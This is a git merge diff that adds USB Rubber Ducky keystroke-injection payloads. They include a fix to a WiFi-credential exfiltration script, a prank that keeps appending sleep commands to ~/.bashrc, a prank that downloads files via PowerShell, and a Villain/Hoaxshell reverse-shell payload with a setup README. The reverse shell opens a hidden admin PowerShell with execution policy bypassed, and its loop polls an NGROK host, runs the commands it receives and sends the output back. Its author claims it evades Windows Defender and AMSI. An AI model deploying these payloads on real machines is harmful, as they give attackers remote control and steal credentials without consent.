Merge branch 'hak5:master' into master

payloads/library/exfiltration/DUCKY-WIFI_GRABER/payload.txt

@@ -80,7 +80,7 @@ STRING $SMTPInfo.Send($ReportEmail)
 ENTER
 REM Delete Log.txt and exit
 DELAY 3000
-STRING del Log.txt
+STRINGLN del Log.txt
 DELAY 500
-STRING exit
+STRINGLN exit
 ENTER

payloads/library/prank/Deshellerator/payload.txt

@@ -0,0 +1,68 @@
+REM TITLE: Deshellerator
+REM AUTHOR: Korben, Darren
+REM VERSION: 1.0
+
+REM DESCRIPTION: "Slow down there buckaroo" - Shell Decelerator
+REM Every time a shell is opened (that sources ~/.bashrc), opening the next
+REM shell will get ever so slightly slower...
+
+REM TARGETS: Linux - tested on ubuntu
+REM REQUIREMENTS: DuckyScript 3, PayloadStudio >1.3
+
+DEFINE #TARGET_FILE ~/.bashrc
+DEFINE #DECELERATION_RATE 0.5
+
+REM Delay used for waiting for GUI elements to spawn/react
+REM Increase to make more compatible with all systems
+DEFINE #UI_DELAY 250
+
+LED_OFF
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
+
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
+
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
+
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
+
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM     STRING HELLO WINDOWS!
+    REM ELSE
+    REM     STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+REM Inapplicable target guard clause
+IF ($_OS == WINDOWS) THEN
+    ATTACKMODE OFF
+    LED_R
+    STOP_PAYLOAD
+END_IF
+
+CTRL ALT t
+DELAY #UI_DELAY
+STRINGLN echo "echo 'sleep #DECELERATION_RATE'>>#TARGET_FILE">>#TARGET_FILE;exit
+LED_G

payloads/library/prank/PUBLIC-SERVICE-ANNOUNCEMENT/PSA.txt

@@ -0,0 +1,42 @@
+REM PUBLIC-SERVICE-ANNOUCEMENT
+REM (or (EAS)ter-eggs)
+REM By Lumen
+REM Warns the user of the danger of ducks!
+DEFINE EGG1 example.com/egg1.png
+DEFINE EGG2 example.com/egg2.png
+DEFINE EGG3 example.com/egg3.png
+DEFINE EGG4 example.com/egg5.png
+DEFINE TEXTFILE example.com/a_friendly_psa.txt
+REM See below for how to configure these URLs
+DELAY 500
+GUI r
+DELAY 300
+STRING powershell
+DELAY 300
+ENTER
+DELAY 600
+STRING Invoke-WebRequest -Uri "
+STRING TEXTFILE
+STRING " -OutFile "~\Desktop\a_friendly_psa.txt"; Invoke-WebRequest -Uri "
+STRING EGG1
+STRING " -OutFile "~\Documents\egg1.png"; Invoke-WebRequest -Uri "
+STRING EGG2
+STRING " -OutFile "~\Pictures\egg2.png"; Invoke-WebRequest -Uri "
+STRING EGG3
+STRING " -OutFile "~\Documents\My Games\egg3.png"; Invoke-WebRequest -Uri "
+STRING EGG4
+STRING " -OutFile "~\Downloads\egg5.png"; & ~\Desktop\a_friendly_psa.txt
+ENTER
+REM This script makes heavy use of the Invoke-WebRequest command, which
+REM gathers a webpage and optionally saves it
+REM Here, we use it to give the user a nice warning about security :D
+REM This script hides 4 eggs, gives a little warning, and may
+REM or may not send them on a quest for a mythical 5th egg ¯\_(ツ)_/¯
+REM These statements can be removed to save on space, and the links above
+REM can be changed to short links to save on typing time
+
+REM To set up the URLs for deployment, use a file share service to host
+REM the 4 images and text files that come with this payload.
+REM Any file share can be used as long as it offers a link
+REM directly to the file that can be saved or downloaded
+REM (for example, a dropbox link with ?dl=1 at the end)

payloads/library/prank/PUBLIC-SERVICE-ANNOUNCEMENT/a_friendly_psa.txt

@@ -0,0 +1,24 @@
+So you left your computer unlocked...
+
+Not a good idea! It only takes a few seconds of access to your computer
+download, install, and execute code! For example, someone could use a tool
+called a USB Rubber Ducky (https://shop.hak5.org/products/usb-rubber-ducky)
+to quickly inject code into your PC... which somebody already did!
+
+If you're seeing this, it means someone plugged a device into your computer
+and used a piece of code called PUBLIC_SERVICE_ANNOUNCEMENT
+(https://github.com/Lumen-git/RubberDucky-PublicServiceAnnouncement)
+to warn you of the dangers of leaving your computer unlocked in a public space! Now, 5 
+images of Easter Eggs have been downloaded to your computer. I'll give you a hint, 
+the first is in "My Documents". 
+
+Just think if someone downloaded a crypto miner! Or uploaded all your files
+to the internet! Stay safe, and protect your PC!
+
+
+Computer Safety Tips (see #6!!): https://security.berkeley.edu/resources/best-practices-how-to-articles/top-10-secure-computing-tips
+Other USB attacks that could have happened: https://www.bleepingcomputer.com/news/security/heres-a-list-of-29-different-types-of-usb-attacks/
+
+
+Although the code was written my Lumen, they do not suggest its use on targets
+without permission, nor do they hold any responsibility for its use.

payloads/library/remote_access/VillainShellviaNGROKTunnel/README.MD

@@ -0,0 +1,48 @@
+**Title: Hoaxshell via Villain Payload and NGROK Tunnel**
+
+<p>Author: HackingMark<br>
+OS: Windows<br>
+Version: 1.0<br>
+Requirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK</p>
+
+**What is Villain?**
+#
+*Villain is a Toolset to setup Payloads and Listener for Hoaxshell*
+*Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger*
+*The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. *
+*That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.*
+
+
+
+**How to use this Payload**
+
+First clone Villain from Repo:
+`git clone https://github.com/t3l3machus/Villain`
+Then install Requirements:
+`cd Villain`
+`pip install -r ./requirements.txt`
+Allow Villain to start:
+`chmod +x ./Villain.py`
+Fire it up:
+`./Villain.py`
+Generate a payload to get the session identifier:
+`generate os=windows lhost=0.0.0.0 lport=8080`
+![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/villain.png)
+
+Establish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine
+`ngrok http 8080`
+![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok1.png)
+Leave this Window open
+![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/ngrok2.png)
+
+**Preparing the Payload:**
+You need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain
+Put it into the Payload then compile it to inject.bin and download.
+![alt text](https://github.com/HackingMark/usbrubberducky-payloads/blob/master/payloads/library/remote_access/VillainShellviaNGROKTunnel/media/payloadstudio.png)
+
+Copy your Inject.bin to your Ducky!
+
+<p>Plug your Ducky into a Windows target.<br>
+Achieve reverse shell.<br>
+   open a shell with </p>
+   `shell SESSION-ID`

payloads/library/remote_access/VillainShellviaNGROKTunnel/payload.txt

@@ -0,0 +1,42 @@
+REM Villain Shell via NGROK
+REM HackingMark
+REM DESCRIPTION This Script spawns a Admin Powershellwindow  and executes the Villain Payload throug an NGROK Tunnel in the Background(Win10)/minimized(Win11)
+
+REM Villain Hoaxshell by T3l3machus on Github: https://github.com/t3l3machus/Villain 
+REM What to do before: Start Villain.py on your System and create a Payload (generate os=windows lhost=0.0.0.0 lport=8080) to get the $i value
+REM take the generated Value from $i and paste it in line 11-13
+REM Start Ngrok Tunnel (ngrok http 8080)
+REM Put your NGROK HTTPS Link here
+DEFINE #NGROK Example.com
+REM Split your Sessionnumber into 3 parts eg $i='4ba4f358-322d5df5-f4516c91'
+DEFINE #SN1 4ba4f358
+DEFINE #SN2 322d5df5
+DEFINE #SN3 f4516c91
+
+
+DELAY 2000
+GUI x
+DELAY 200
+STRING a
+DELAY 500
+ALT j
+REM The Part above needs to be adapted to your language, code is for German System Layouts
+DELAY 1000
+STRING powershell -w h -NoP -NonI -ep Bypass -C {$s='
+STRING #NGROK
+STRING ';$i='
+STRING #SN1
+STRING -
+STRING #SN2
+STRING -
+STRING #SN3
+STRING ';$p='h'+'ttps://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/
+STRING #SN1
+STRING /$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/
+STRING #SN2
+SPACE
+STRING -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/
+STRING #SN3
+SPACE
+STRING -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}
+ENTER